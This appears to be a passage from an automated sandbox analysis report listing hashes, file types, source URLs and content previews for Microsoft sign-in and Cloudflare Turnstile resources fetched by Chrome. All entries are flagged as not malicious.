                                                                                                    SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                    Malicious:false
                                                                                                    URL:https://login.live.com/Me.htm?v=3
                                                                                                    Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):61
                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                    Malicious:false
                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):16378
                                                                                                    Entropy (8bit):7.986541062710992
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:hOBEj/gTOkWow647Z1Y8hyJavTiIQslkHC:hOBKJB11Y8heariIQ8ki
                                                                                                    MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                                                                                    SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                                                                                    SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                                                                                    SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                                                                                    Malicious:false
                                                                                                    URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_v20ia-gahguvu2fgvxamhg2.js
                                                                                                    Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):72
                                                                                                    Entropy (8bit):4.241202481433726
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                    MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                    SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                    SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                    SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                    Malicious:false
                                                                                                    Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):621
                                                                                                    Entropy (8bit):7.673946009263606
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                    MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                    SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                    SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                    SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                    Malicious:false
                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                                                    Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 19 x 22, 8-bit/color RGB, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):61
                                                                                                    Entropy (8bit):4.068159130770306
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPlmpttl/6yxl/k4E08up:6v/lhPGT/6y7Tp
                                                                                                    MD5:C766E24978C7AE242C5AD077724A6AD4
                                                                                                    SHA1:F0C28C94B5F5A8FB21413BABB3D3428088EE538F
                                                                                                    SHA-256:F08CAA874E2DED8D70A98C427F60310BBAF0CE00CB9982B8A00D3F292E30956F
                                                                                                    SHA-512:C0BCF9BB323C509DA6024B158B8C2E9D8283C883B790FC814CE46CCDD0A5B1632B6889CB946ECE0565F90753F1F37B6D53BF41651BC6E7AB39F8A6BA443DA77A
                                                                                                    Malicious:false
                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/901f629158744368/1736876154281/IuOmzKH2y67OPFE
                                                                                                    Preview:.PNG........IHDR...............0(....IDAT.....$.....IEND.B`.
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (47520)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):47521
                                                                                                    Entropy (8bit):5.3981340461317835
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                                                    MD5:7C92EC9D1395055CE0405A32607C7291
                                                                                                    SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                                                    SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                                                    SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                                                    Malicious:false
                                                                                                    Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (47520)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):47521
                                                                                                    Entropy (8bit):5.3981340461317835
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                                                    MD5:7C92EC9D1395055CE0405A32607C7291
                                                                                                    SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                                                    SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                                                    SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                                                    Malicious:false
                                                                                                    URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                                                    Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):5525
                                                                                                    Entropy (8bit):7.961202222662501
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                                    MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                                    SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                                    SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                                    SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                                    Malicious:false
                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                                                    Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):96
                                                                                                    Entropy (8bit):5.218997042938778
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWd6Nk:NciczBdTFsJFoM+q62Nk
                                                                                                    MD5:9872BE83FA60DA999B65A3BD481731D3
                                                                                                    SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                                                                                    SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                                                                                    SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                                                                                    Malicious:false
                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                                                    Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                    Category:dropped
                                                                                                    Size (bytes):621
                                                                                                    Entropy (8bit):7.673946009263606
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                    MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                    SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                    SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                    SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                    Malicious:false
                                                                                                    Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:GIF image data, version 89a, 352 x 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3620
                                                                                                    Entropy (8bit):6.867828878374734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                    MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                    SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                    SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                    SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                    Malicious:false
                                                                                                    Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35170
                                                                                                    Entropy (8bit):7.993096534744333
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                                    MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                                    SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                                    SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                                    SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                                    Malicious:false
                                                                                                    Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):17174
                                                                                                    Entropy (8bit):2.9129715116732746
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                    MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                    SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                    SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                    SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                    Malicious:false
                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                                    Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 19 x 22, 8-bit/color RGB, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61
                                                                                                    Entropy (8bit):4.068159130770306
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPlmpttl/6yxl/k4E08up:6v/lhPGT/6y7Tp
                                                                                                    MD5:C766E24978C7AE242C5AD077724A6AD4
                                                                                                    SHA1:F0C28C94B5F5A8FB21413BABB3D3428088EE538F
                                                                                                    SHA-256:F08CAA874E2DED8D70A98C427F60310BBAF0CE00CB9982B8A00D3F292E30956F
                                                                                                    SHA-512:C0BCF9BB323C509DA6024B158B8C2E9D8283C883B790FC814CE46CCDD0A5B1632B6889CB946ECE0565F90753F1F37B6D53BF41651BC6E7AB39F8A6BA443DA77A
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR...............0(....IDAT.....$.....IEND.B`.
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):122725
                                                                                                    Entropy (8bit):7.997347629519925
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                                                    MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                                                    SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                                                    SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                                                    SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                                                    Malicious:false
                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_n7VKwtWYm2mBLcIKAZfQlw2.js
                                                                                                    Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                                                    Category:dropped
                                                                                                    Size (bytes):122725
                                                                                                    Entropy (8bit):7.997347629519925
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                                                    MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                                                    SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                                                    SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                                                    SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                                                    Malicious:false
